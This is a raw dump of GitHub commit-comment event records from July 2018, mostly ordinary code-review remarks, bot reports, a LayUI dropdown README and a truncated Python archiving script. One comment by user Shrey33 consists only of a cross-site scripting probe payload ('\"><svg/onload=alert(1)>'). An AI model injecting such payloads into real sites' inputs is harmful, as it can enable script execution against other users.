{"id":"7917260666","type":"CommitCommentEvent","actor":{"login":"w36889935"},"repo":{"name":"w36889935/LayUiComponent"},"payload":{"comment":{"id":29592070,"position":null,"line":null,"path":null,"commit_id":"6e92328ea76cfe592ca74eb19f86f6227b0eb79f","created_at":"2018-07-04T09:17:39Z","updated_at":"2018-07-04T09:17:39Z","author_association":"OWNER","body":"## 下拉框联动 ##\r\n*****\r\n>**起步**\r\n\r\n引入LayUi、Jquery、layui-cascade文件\r\n```javascript\r\n<link rel=\"stylesheet\" href=\"layui/css/layui.css\"  media=\"all\">\r\n<script type=\"text/javascript\" src=\"layui/layui.js\"></script>\r\n<script src=\"https://cdn.bootcss.com/jquery/1.10.2/jquery.min.js\"></script>\r\n<script type=\"text/javascript\" src=\"/LayUiComponent/layui-cascade-1.0.1/layui-cascade-1.0.1.js\"></script>\r\n```\r\n\r\n---\r\n\r\n---\r\n\r\n>**HTML部分代码**\r\n```HTML\r\n<form class=\"layui-form\" action=\"\" id=\"textDemo\">\r\n\t\t  <label class=\"layui-form-label\">省份：</label>\r\n\t\t  <div class=\"layui-col-xs2\">\r\n\t\t      <select id=\"province\"  lay-verify=\"required\"\r\n\t\t        data-cc-autoload=\"true\"\r\n\t\t\t\tdata-cc-url=\"json/Province.json\"\r\n\t\t\t\tdata-cc-key=\"id\"\r\n\t\t\t\tdata-cc-next=\"city\"\r\n\t\t      >\r\n\t\t      </select>\r\n\t  \t  </div>\r\n\t  \t  <label class=\"layui-form-label\">市：</label>\r\n\t  \t  <div class=\"layui-col-xs2\">\r\n\t\t      <select id=\"city\" lay-verify=\"required\"\r\n\t\t\t\tdata-cc-url=\"json/Province.json\"\r\n\t\t\t\tdata-cc-key=\"id\"\r\n\t\t\t\tdata-cc-next=\"area\"\r\n\t\t      >\r\n\t\t        \r\n\t\t      </select>\r\n\t  \t  </div>\r\n\t  \t  <label class=\"layui-form-label\">区/县：</label>\r\n\t  \t  <div class=\"layui-col-xs2\">\r\n\t\t      <select id=\"area\" lay-verify=\"required\"\r\n\t\t\t\tdata-cc-url=\"json/Province.json\"\r\n\t\t\t\tdata-cc-key=\"id\"\r\n\t\t      ></select>\r\n\t  \t  </div>\r\n\t</form>\r\n```\r\n\r\n\r\n**参数说明**\r\n属性名|属性值|说明\r\n---|:--:|---\r\ndata-cc-autoload|任意字符|初始化自动加载该下拉框数据\r\ndata-cc-url|任意字符|下拉框数据请求地址\r\ndata-cc-key|任意字符|请求参数名\r\ndata-cc-next|任意字符|下一个关联的下拉框ID\r\n\r\n---\r\n---\r\n\r\n>**下拉框联动**\r\n```javascript\r\nlayui.use('form', function(){\r\n  $(\"#textDemo\").layCascade();\r\n});\r\n```"}},"created_at":"2018-07-04T09:17:39Z"}
{"id":"7917264237","type":"CommitCommentEvent","actor":{"login":"snopoke"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29592079,"position":10,"line":20,"path":"corehq/sql_accessors/migrations/0007_rename_get_case_attachment_by_name.py","commit_id":"ce9732345b131e128c0d0c578892042194d5b489","created_at":"2018-07-04T09:18:17Z","updated_at":"2018-07-04T09:18:17Z","author_association":"CONTRIBUTOR","body":"I think you can `noop` this as well"}},"created_at":"2018-07-04T09:18:17Z"}
{"id":"7917269360","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29592090,"position":null,"line":null,"path":null,"commit_id":"1d8a1b756b50875097971be6370d2323152de6d1","created_at":"2018-07-04T09:19:11Z","updated_at":"2018-07-04T09:19:11Z","author_association":"OWNER","body":"delete img/"}},"created_at":"2018-07-04T09:19:11Z"}
{"id":"7917271323","type":"CommitCommentEvent","actor":{"login":"Mpiima"},"repo":{"name":"Mpiima/group5"},"payload":{"comment":{"id":29592093,"position":null,"line":null,"path":null,"commit_id":"29e34b27ab111ea5e0dabfb92f67daedac900d28","created_at":"2018-07-04T09:19:32Z","updated_at":"2018-07-04T09:19:32Z","author_association":"OWNER","body":"okay seen but be serious"}},"created_at":"2018-07-04T09:19:32Z"}
{"id":"7917271930","type":"CommitCommentEvent","actor":{"login":"ehmry"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":29592095,"position":4,"line":26,"path":"repos/os/src/server/vfs/main.cc","commit_id":"ae07c55d6b9ae6ac26dec180925e117ff738bc00","created_at":"2018-07-04T09:19:39Z","updated_at":"2018-07-04T09:19:39Z","author_association":"OWNER","body":"Its not, I was adding some dither to the batch size but decided against it."}},"created_at":"2018-07-04T09:19:39Z"}
{"id":"7917277278","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29592104,"position":null,"line":null,"path":null,"commit_id":"2269fe7890fb3c8b651216c7b333690424441bae","created_at":"2018-07-04T09:20:36Z","updated_at":"2018-07-04T09:20:36Z","author_association":"OWNER","body":"delete img/"}},"created_at":"2018-07-04T09:20:36Z"}
{"id":"7917278674","type":"CommitCommentEvent","actor":{"login":"w36889935"},"repo":{"name":"w36889935/LayUiComponent"},"payload":{"comment":{"id":29592109,"position":2,"line":2,"path":"README.md","commit_id":"6e92328ea76cfe592ca74eb19f86f6227b0eb79f","created_at":"2018-07-04T09:20:51Z","updated_at":"2018-07-04T09:20:51Z","author_association":"OWNER","body":"## 下拉框联动 ##\r\n*****\r\n>**起步**\r\n\r\n引入LayUi、Jquery、layui-cascade文件\r\n```javascript\r\n<link rel=\"stylesheet\" href=\"layui/css/layui.css\"  media=\"all\">\r\n<script type=\"text/javascript\" src=\"layui/layui.js\"></script>\r\n<script src=\"https://cdn.bootcss.com/jquery/1.10.2/jquery.min.js\"></script>\r\n<script type=\"text/javascript\" src=\"/LayUiComponent/layui-cascade-1.0.1/layui-cascade-1.0.1.js\"></script>\r\n```\r\n\r\n---\r\n\r\n---\r\n\r\n>**HTML部分代码**\r\n```HTML\r\n<form class=\"layui-form\" action=\"\" id=\"textDemo\">\r\n\t\t  <label class=\"layui-form-label\">省份：</label>\r\n\t\t  <div class=\"layui-col-xs2\">\r\n\t\t      <select id=\"province\"  lay-verify=\"required\"\r\n\t\t        data-cc-autoload=\"true\"\r\n\t\t\t\tdata-cc-url=\"json/Province.json\"\r\n\t\t\t\tdata-cc-key=\"id\"\r\n\t\t\t\tdata-cc-next=\"city\"\r\n\t\t      >\r\n\t\t      </select>\r\n\t  \t  </div>\r\n\t  \t  <label class=\"layui-form-label\">市：</label>\r\n\t  \t  <div class=\"layui-col-xs2\">\r\n\t\t      <select id=\"city\" lay-verify=\"required\"\r\n\t\t\t\tdata-cc-url=\"json/Province.json\"\r\n\t\t\t\tdata-cc-key=\"id\"\r\n\t\t\t\tdata-cc-next=\"area\"\r\n\t\t      >\r\n\t\t        \r\n\t\t      </select>\r\n\t  \t  </div>\r\n\t  \t  <label class=\"layui-form-label\">区/县：</label>\r\n\t  \t  <div class=\"layui-col-xs2\">\r\n\t\t      <select id=\"area\" lay-verify=\"required\"\r\n\t\t\t\tdata-cc-url=\"json/Province.json\"\r\n\t\t\t\tdata-cc-key=\"id\"\r\n\t\t      ></select>\r\n\t  \t  </div>\r\n\t</form>\r\n```\r\n\r\n\r\n**参数说明**\r\n属性名|属性值|说明\r\n---|:--:|---\r\ndata-cc-autoload|任意字符|初始化自动加载该下拉框数据\r\ndata-cc-url|任意字符|下拉框数据请求地址\r\ndata-cc-key|任意字符|请求参数名\r\ndata-cc-next|任意字符|下一个关联的下拉框ID\r\n\r\n---\r\n---\r\n\r\n>**下拉框联动**\r\n```javascript\r\nlayui.use('form', function(){\r\n  $(\"#textDemo\").layCascade();\r\n});\r\n```"}},"created_at":"2018-07-04T09:20:51Z"}
{"id":"7917279883","type":"CommitCommentEvent","actor":{"login":"mrmiad94"},"repo":{"name":"mrmiad94/hello-world"},"payload":{"comment":{"id":29592116,"position":null,"line":null,"path":null,"commit_id":"f234b761cc32c6a17f719bfd71834f61d1265ae4","created_at":"2018-07-04T09:21:06Z","updated_at":"2018-07-04T09:21:06Z","author_association":"OWNER","body":"![3](https://user-images.githubusercontent.com/40807116/42268641-9063b144-7f6b-11e8-897f-500fcfa9cf05.jpg)\r\n"}},"created_at":"2018-07-04T09:21:06Z"}
{"id":"7917286269","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29592132,"position":null,"line":null,"path":null,"commit_id":"25491e9ee10f6b5d94edc9d0ada270344c0f240e","created_at":"2018-07-04T09:22:15Z","updated_at":"2018-07-04T09:22:15Z","author_association":"OWNER","body":"delete img/"}},"created_at":"2018-07-04T09:22:15Z"}
{"id":"7917287887","type":"CommitCommentEvent","actor":{"login":"JacopKane"},"repo":{"name":"blackakula/redux-composite-demo"},"payload":{"comment":{"id":29592137,"position":45,"line":40,"path":"src/index.js","commit_id":"8cf3ecda7e133255d4e9e8713ee85c0daab38d28","created_at":"2018-07-04T09:22:33Z","updated_at":"2018-07-04T09:22:33Z","author_association":"CONTRIBUTOR","body":"wow this is some hell of dot notation train for a library :) "}},"created_at":"2018-07-04T09:22:33Z"}
{"id":"7917288910","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29592142,"position":24,"line":213,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"b6e701e9fbd98d29afdc25c9ce09cc9320a94372","created_at":"2018-07-04T09:22:45Z","updated_at":"2018-07-04T09:22:45Z","author_association":"NONE","body":"отлично )\r\nначни с предыдущего урока, с ООП... и давай по одному классу писать\r\nнапишешь первый класс - присылай ссылку на репозиторий и мы обсудим\r\nесли будут по учебным материалам вопросы, то лучше тоже сразу задавай, до того, как начнешь писать код\r\n"}},"created_at":"2018-07-04T09:22:45Z"}
{"id":"7917293652","type":"CommitCommentEvent","actor":{"login":"JacopKane"},"repo":{"name":"blackakula/redux-composite-demo"},"payload":{"comment":{"id":29592159,"position":17,"line":17,"path":"src/index.js","commit_id":"8cf3ecda7e133255d4e9e8713ee85c0daab38d28","created_at":"2018-07-04T09:23:38Z","updated_at":"2018-07-04T09:23:38Z","author_association":"CONTRIBUTOR","body":"why do you need `let`  here"}},"created_at":"2018-07-04T09:23:38Z"}
{"id":"7917294849","type":"CommitCommentEvent","actor":{"login":"juanibiapina"},"repo":{"name":"marceloboeira/dot-files"},"payload":{"comment":{"id":29592161,"position":null,"line":null,"path":null,"commit_id":"406faadbd9afbf6643860becc97ba4ca157d6064","created_at":"2018-07-04T09:23:52Z","updated_at":"2018-07-04T09:23:52Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-04T09:23:52Z"}
{"id":"7917295213","type":"CommitCommentEvent","actor":{"login":"omisego-bot"},"repo":{"name":"omisego/ewallet"},"payload":{"comment":{"id":29592162,"position":4,"line":null,"path":"apps/admin_api/lib/admin_api/application.ex","commit_id":"928d9ca2600216b235ae7b793e88c38e81ab2f26","created_at":"2018-07-04T09:23:57Z","updated_at":"2018-07-04T09:23:57Z","author_association":"NONE","body":"The alias `AdminAPI.Config` is not alphabetically ordered among its group."}},"created_at":"2018-07-04T09:23:57Z"}
{"id":"7917295241","type":"CommitCommentEvent","actor":{"login":"omisego-bot"},"repo":{"name":"omisego/ewallet"},"payload":{"comment":{"id":29592163,"position":2,"line":null,"path":"rel/config.exs","commit_id":"928d9ca2600216b235ae7b793e88c38e81ab2f26","created_at":"2018-07-04T09:23:57Z","updated_at":"2018-07-04T09:23:57Z","author_association":"NONE","body":"Pipe chain should start with a raw value."}},"created_at":"2018-07-04T09:23:57Z"}
{"id":"7917295273","type":"CommitCommentEvent","actor":{"login":"omisego-bot"},"repo":{"name":"omisego/ewallet"},"payload":{"comment":{"id":29592165,"position":13,"line":null,"path":"apps/ewallet/lib/ewallet/web/paginator.ex","commit_id":"928d9ca2600216b235ae7b793e88c38e81ab2f26","created_at":"2018-07-04T09:23:58Z","updated_at":"2018-07-04T09:23:58Z","author_association":"NONE","body":"The variable Vvalue@2 can never match since previous clauses completely covered the type 'nil' | binary()"}},"created_at":"2018-07-04T09:23:58Z"}
{"id":"7917298883","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"priyankawgbl/assignment1"},"payload":{"comment":{"id":29592178,"position":28,"line":28,"path":"css/assignment1.css","commit_id":"0e4488f7ce08fdafa5254dbe755944bdb0d3164f","created_at":"2018-07-04T09:24:39Z","updated_at":"2018-07-04T09:24:39Z","author_association":"NONE","body":"Use proper Naming Conventions"}},"created_at":"2018-07-04T09:24:39Z"}
{"id":"7917324674","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29592280,"position":13,"line":68,"path":"compiler/frontend.java/src/org/jetbrains/kotlin/synthetic/JavaSyntheticPropertiesScope.kt","commit_id":"7e61e2d39a3e507eb3300fbbb4e44fb79c0af3ff","created_at":"2018-07-04T09:29:26Z","updated_at":"2018-07-04T09:29:26Z","author_association":"MEMBER","body":"`.flatMap` can be moved to a new line for better formatting."}},"created_at":"2018-07-04T09:29:26Z"}
{"id":"7917326651","type":"CommitCommentEvent","actor":{"login":"JacopKane"},"repo":{"name":"blackakula/redux-composite-demo"},"payload":{"comment":{"id":29592285,"position":45,"line":40,"path":"src/index.js","commit_id":"8cf3ecda7e133255d4e9e8713ee85c0daab38d28","created_at":"2018-07-04T09:29:50Z","updated_at":"2018-07-04T09:29:50Z","author_association":"CONTRIBUTOR","body":"btw this approach is similar to `mobx` you should check it out. it's using observables so much nicer imo"}},"created_at":"2018-07-04T09:29:50Z"}
{"id":"7917329633","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29592296,"position":null,"line":null,"path":null,"commit_id":"506855ceaba9998b58e453321226b4ae1320cd5d","created_at":"2018-07-04T09:30:25Z","updated_at":"2018-07-04T09:30:25Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-MacOS-10.9-clang: OK (2806 of 2930 tests passed, 39 test warnings)\n\nMessages:\n\n * 10 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 99 tests had: EIO diffs.\n * 115 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 99 tests had: MTR small diffs.\n * 151 tests had: RDD diffs.\n * 123 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 4 tests had: ERR diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 499\n * Failed: 124\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.77%25-yellow.png)</a> \n"}},"created_at":"2018-07-04T09:30:25Z"}
{"id":"7917331102","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29592300,"position":null,"line":null,"path":null,"commit_id":"a2625c36a08f15cb7ca82d53ece7401b6ff70eb1","created_at":"2018-07-04T09:30:41Z","updated_at":"2018-07-04T09:30:41Z","author_association":"COLLABORATOR","body":"I encountered strange behavior of the slider?! Need your help/advice.\r\n\r\nPlease watch [this video](http://nic.caucasus.net/mlvapp/?dir=&download=misbehaving_slider.mp4)"}},"created_at":"2018-07-04T09:30:41Z"}
{"id":"7917331430","type":"CommitCommentEvent","actor":{"login":"JacopKane"},"repo":{"name":"blackakula/redux-composite-demo"},"payload":{"comment":{"id":29592301,"position":45,"line":40,"path":"src/index.js","commit_id":"8cf3ecda7e133255d4e9e8713ee85c0daab38d28","created_at":"2018-07-04T09:30:45Z","updated_at":"2018-07-04T09:30:45Z","author_association":"CONTRIBUTOR","body":"or w pure rxjs"}},"created_at":"2018-07-04T09:30:45Z"}
{"id":"7917331669","type":"CommitCommentEvent","actor":{"login":"dduyrat"},"repo":{"name":"bigbluebutton/bbb-install"},"payload":{"comment":{"id":29592303,"position":null,"line":null,"path":null,"commit_id":"1e95d7fdd250b6b0e836672cefa9dd4ec8c2f511","created_at":"2018-07-04T09:30:47Z","updated_at":"2018-07-04T09:30:47Z","author_association":"NONE","body":"Hello, I do not understand where and how to change the renewal of the certificate. How should I use this scrypt: should I open a notepad and copy paste information and send by ftp to a file?\r\nThank you for your reply."}},"created_at":"2018-07-04T09:30:47Z"}
{"id":"7917344463","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29592335,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-04T09:33:08Z","updated_at":"2018-07-04T09:33:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T09:33:08Z"}
{"id":"7917345301","type":"CommitCommentEvent","actor":{"login":"Shrey33"},"repo":{"name":"Shrey33/hobbs"},"payload":{"comment":{"id":29592340,"position":null,"line":null,"path":null,"commit_id":"c0cebdba40c537d19bb2afa00da070f0b903c3f4","created_at":"2018-07-04T09:33:17Z","updated_at":"2018-07-04T09:33:17Z","author_association":"OWNER","body":"\"><svg/onload=alert(1)>"}},"created_at":"2018-07-04T09:33:17Z"}
{"id":"7917346362","type":"CommitCommentEvent","actor":{"login":"nWidart"},"repo":{"name":"enextiarg/laravel-modules"},"payload":{"comment":{"id":29592344,"position":5,"line":91,"path":"src/Commands/stubs/scaffold/provider.stub","commit_id":"ca92218ce33affce6c25791295f11cfacdc04622","created_at":"2018-07-04T09:33:28Z","updated_at":"2018-07-04T09:33:28Z","author_association":"NONE","body":"I think these can be merged with the previous condition."}},"created_at":"2018-07-04T09:33:28Z"}
{"id":"7917347926","type":"CommitCommentEvent","actor":{"login":"PeterHiroshi"},"repo":{"name":"PeterHiroshi/Draughts_QT"},"payload":{"comment":{"id":29592348,"position":null,"line":null,"path":null,"commit_id":"4ead70a5e4e8f3c4447cc5a40677b98dc1212abf","created_at":"2018-07-04T09:33:45Z","updated_at":"2018-07-04T09:33:45Z","author_association":"OWNER","body":"Add version selection dialog on the main window"}},"created_at":"2018-07-04T09:33:45Z"}
{"id":"7917349935","type":"CommitCommentEvent","actor":{"login":"gassnake999"},"repo":{"name":"gassnake999/vue_directive_waves"},"payload":{"comment":{"id":29592353,"position":16,"line":16,"path":"README.md","commit_id":"da4417cc71ff42d38b27bc55a00d4341360b22c7","created_at":"2018-07-04T09:34:09Z","updated_at":"2018-07-04T09:34:09Z","author_association":"OWNER","body":"3. 启动项目"}},"created_at":"2018-07-04T09:34:09Z"}
{"id":"7917354224","type":"CommitCommentEvent","actor":{"login":"cardil"},"repo":{"name":"coi-gov-pl/java-cascades"},"payload":{"comment":{"id":29592364,"position":4,"line":178,"path":"pom.xml","commit_id":"61ba82a41e32599c68e84ce1886a0c94860a0942","created_at":"2018-07-04T09:34:57Z","updated_at":"2018-07-04T09:34:57Z","author_association":"MEMBER","body":"It's should be configured on SonarCloud, I think. I'ts that way on local SonarQube instalation.\r\n\r\nYou can't add this as a dependency to application!"}},"created_at":"2018-07-04T09:34:57Z"}
{"id":"7917358506","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29592373,"position":41,"line":49,"path":"idea/src/org/jetbrains/kotlin/idea/search/ideaExtensions/KotlinPropertyAccessorsReferenceSearcher.kt","commit_id":"fa7342fbbf6f1b1303739ef8358122978ea73409","created_at":"2018-07-04T09:35:45Z","updated_at":"2018-07-04T09:35:45Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-04T09:35:45Z"}
{"id":"7917360430","type":"CommitCommentEvent","actor":{"login":"CarolErnst"},"repo":{"name":"OpenFn/nrc"},"payload":{"comment":{"id":29592376,"position":null,"line":null,"path":null,"commit_id":"7594d50572559729f6980c91ebd8355e36fa4a69","created_at":"2018-07-04T09:36:08Z","updated_at":"2018-07-04T09:36:08Z","author_association":"COLLABORATOR","body":"Updated mapping for MainProjectCode and FrameProjectCode based on sample file provided by NRC Finance."}},"created_at":"2018-07-04T09:36:08Z"}
{"id":"7917365440","type":"CommitCommentEvent","actor":{"login":"dl8bh"},"repo":{"name":"dovecot/core"},"payload":{"comment":{"id":29592401,"position":null,"line":null,"path":null,"commit_id":"4ff4bd024a9b6e7973b76b186ce085c2ca669d3e","created_at":"2018-07-04T09:37:02Z","updated_at":"2018-07-04T09:37:02Z","author_association":"NONE","body":"Did not fix my problem, if this patch was meant to be included in 2.3.2 (iirc it turned out in our IRC debugging session, that acl containing \"@\" in usernames are not handled correctly):\r\n\r\n```\r\nroot@mail-1:~ # dovecot --version\r\n2.3.2 (582970113)\r\n\r\nroot@mail-1:~ # doveadm -Dv backup -P -n INBOX -u listen@example.com mdbox:/usr/local/mail-snapshots/example.com/listen/mdbox\r\n[...]\r\ndsync(listen@example.com): Debug: Namespace : Using permissions from /usr/local/mail-snapshots/example.com/listen/mdbox: mode=0700 gid=default\r\ndsync(listen@example.com): Debug: Namespace : Using permissions from /usr/local/mail/example.com/listen/mdbox: mode=0700 gid=default\r\ndsync(listen@example.com): Debug: acl vfile: reading file /usr/local/mail/example.com/listen/mdbox/mailboxes/INBOX/dbox-Mails/dovecot-acl\r\ndsync(listen@example.com): Debug: acl vfile: reading file /usr/local/mail-snapshots/example.com/listen/mdbox/mailboxes/INBOX/dbox-Mails/dovecot-acl\r\ndsync(listen@example.com): Debug: brain S: Import INBOX: Import attribute vendor/vendor.dovecot/pvt/acl/user=privat@example.com: Unchanged value\r\ndsync(listen@example.com): Panic: file mailbox-attribute.c: line 360 (mailbox_attribute_get_stream): assertion failed: (value_r->value != NULL || value_r->value_stream != NULL)\r\nAbort\r\n\r\nroot@mail-1:~ # cat /usr/local/mail/example.com/listen/mdbox/mailboxes/INBOX/dbox-Mails/dovecot-acl \r\nuser=privat@example.com eilprwts\r\n\r\n```"}},"created_at":"2018-07-04T09:37:02Z"}
{"id":"7917368221","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29592412,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-04T09:37:31Z","updated_at":"2018-07-04T09:37:31Z","author_association":"NONE","body":"Juste my little opinion about the debate : \r\nI agree with people saying that patchs should bring a real progress in SF. Patchs with 100 lines to gain perhaps 10 games over 100k games are not so useful.\r\nIn the other hand the actual guidline are perhaps too restrictive. In actual state of SF, we can only add some third order effects with smaller progress than years before. I hope that we sill can find good patches with +5 elo or more but it is sure that it is harder and harder to find them. Maintainers should perhaps think about a \"softening\" of the guidelines to allow patchs of +1 elo or somethink like this. Actually, I am quiet sure we are loosing all these little patchs that can be useful in some special positions."}},"created_at":"2018-07-04T09:37:31Z"}
{"id":"7917371171","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29592422,"position":53,"line":55,"path":"idea/src/org/jetbrains/kotlin/idea/search/ideaExtensions/KotlinPropertyAccessorsReferenceSearcher.kt","commit_id":"fa7342fbbf6f1b1303739ef8358122978ea73409","created_at":"2018-07-04T09:38:05Z","updated_at":"2018-07-04T09:38:05Z","author_association":"MEMBER","body":"Do you think `canBePropertyAccessor(method.name)` can be returned or did you skipped it intentionally because `propertyNameByGetMethodName` and `propertyNameBySetMethodName` do all necessary checks?"}},"created_at":"2018-07-04T09:38:05Z"}
{"id":"7917374710","type":"CommitCommentEvent","actor":{"login":"aadevaza"},"repo":{"name":"aadevaza/newsite"},"payload":{"comment":{"id":29592431,"position":1,"line":1,"path":"first_project-html","commit_id":"2df36570ac88e4f3c4ed4661c7a10a4d851ba19f","created_at":"2018-07-04T09:38:45Z","updated_at":"2018-07-04T09:38:45Z","author_association":"OWNER","body":"coding"}},"created_at":"2018-07-04T09:38:45Z"}
{"id":"7917376868","type":"CommitCommentEvent","actor":{"login":"ksaitor"},"repo":{"name":"cryptojobslist/frontend"},"payload":{"comment":{"id":29592436,"position":null,"line":null,"path":null,"commit_id":"cc29f6c39266a39db37f6f768152313fe07ac86f","created_at":"2018-07-04T09:39:09Z","updated_at":"2018-07-04T09:39:09Z","author_association":"CONTRIBUTOR","body":"@Kr1an, 👆 нашёл опасный баг в JobCreate\r\n\r\nкогда компания не находилась,\r\nи пользователь пытался создать новую компанию\r\nто название компании не сохранялась и не посылалась на сервер\r\n\r\n\r\nНадеюсь никто на это не попал…"}},"created_at":"2018-07-04T09:39:09Z"}
{"id":"7917377918","type":"CommitCommentEvent","actor":{"login":"aadevaza"},"repo":{"name":"aadevaza/newsite"},"payload":{"comment":{"id":29592439,"position":3,"line":3,"path":"first_project-html","commit_id":"2df36570ac88e4f3c4ed4661c7a10a4d851ba19f","created_at":"2018-07-04T09:39:20Z","updated_at":"2018-07-04T09:39:20Z","author_association":"OWNER","body":"ewew"}},"created_at":"2018-07-04T09:39:20Z"}
{"id":"7917378663","type":"CommitCommentEvent","actor":{"login":"shankargunti"},"repo":{"name":"shankargunti/ownDev"},"payload":{"comment":{"id":29592441,"position":null,"line":null,"path":null,"commit_id":"57b821ba7a35da53b7d9076b8a429a859a3fbc68","created_at":"2018-07-04T09:39:29Z","updated_at":"2018-07-04T09:39:29Z","author_association":"OWNER","body":"hxchbxcvbxcb"}},"created_at":"2018-07-04T09:39:29Z"}
{"id":"7917382538","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29592453,"position":null,"line":null,"path":null,"commit_id":"b8b9a93158c84175e809d61608bcdf20127f80e0","created_at":"2018-07-04T09:40:12Z","updated_at":"2018-07-04T09:40:12Z","author_association":"MEMBER","body":"Can you explain me why you removed them? They were cool :(\r\nNot because some of them were by me but because people injected their insider memes ^^"}},"created_at":"2018-07-04T09:40:12Z"}
{"id":"7917387224","type":"CommitCommentEvent","actor":{"login":"AdotDal"},"repo":{"name":"AdotDal/Gallant"},"payload":{"comment":{"id":29592457,"position":null,"line":null,"path":null,"commit_id":"47aef5b3ac729eb75247824ae623aa7be905314f","created_at":"2018-07-04T09:41:04Z","updated_at":"2018-07-04T09:41:04Z","author_association":"OWNER","body":"import os\r\nimport sys\r\nimport time\r\nimport shutil\r\nimport tarfile\r\nfrom os.path import isfile, isdir, join\r\nfrom datetime import datetime\r\nimport logging\r\n\r\n# Global variable for logging\r\nglobal cnt\r\nglobal total_size\r\nglobal log_file_list\r\nis_new = True\r\n\r\n#\r\n# Implementation\r\n#\r\ndef check_date(file_name, flag):\r\n    \"\"\" Function to check that a file is old \"\"\"\r\n\r\n    # Get current date\r\n    now_date = datetime.now().date()\r\n\r\n    n_year = now_date.year\r\n    n_month = now_date.month\r\n    n_day = now_date.day\r\n\r\n    # Get Staging directory name\r\n    if flag == 1:\r\n        # Get timestamp from file name\r\n        modified_timestamp = os.path.getmtime(file_name)\r\n        f_year = datetime.utcfromtimestamp(modified_timestamp).year\r\n        f_month = datetime.utcfromtimestamp(modified_timestamp).month\r\n        f_date =  datetime.utcfromtimestamp(modified_timestamp).day    \r\n\r\n        if (f_year > n_year) or ((f_month >= n_month) and (f_year == n_year)):\r\n            return False\r\n\r\n        if f_month < 12:\r\n            if f_month < 9:\r\n                f_month = '0' + str(f_month + 1)\r\n            else:\r\n                f_month = str(f_month + 1)\r\n\r\n            staging_subdir = '%s%d%s%s' % ('data_prior_to_', f_year, f_month, '01')\r\n        else:\r\n            staging_subdir = '%s%d%s' % ('data_prior_to_', f_year + 1, '0101')\r\n\r\n        return staging_subdir\r\n\r\n    if flag == 2:\r\n        # Get timestamp from file name\r\n        datetime_str_arr = str(file_name).split(\"_\")\r\n        datetime_str = str(datetime_str_arr.pop().split(\".\")[0])\r\n\r\n        f_year = int(datetime_str[0:4])     # year\r\n        f_month = int(datetime_str[4:6])    # month\r\n        f_date = int(datetime_str[6:8])     # date\r\n\r\n        if (f_year < n_year - 1) or (f_year == n_year and f_month < n_month - 6):\r\n            return True;\r\n        elif f_year + 1 == n_year and (f_month <= 6 or (f_month > 6 and (f_month + 6) % 12 <= n_month)):\r\n            return True;\r\n        else:\r\n            return False;\r\n\r\n\r\ndef validate_file(file_name):\r\n    \"\"\" Function to validate file format \"\"\"\r\n\r\n    dir_array = str(file_name).split(\"_\")\r\n\r\n    # Check about directories of Staging directory\r\n    if dir_array.__len__() == 4:\r\n        if dir_array[3].isdigit():\r\n            if len(dir_array[3]) == 8:\r\n                return True\r\n    return False \r\n\r\ndef move_staging(path, 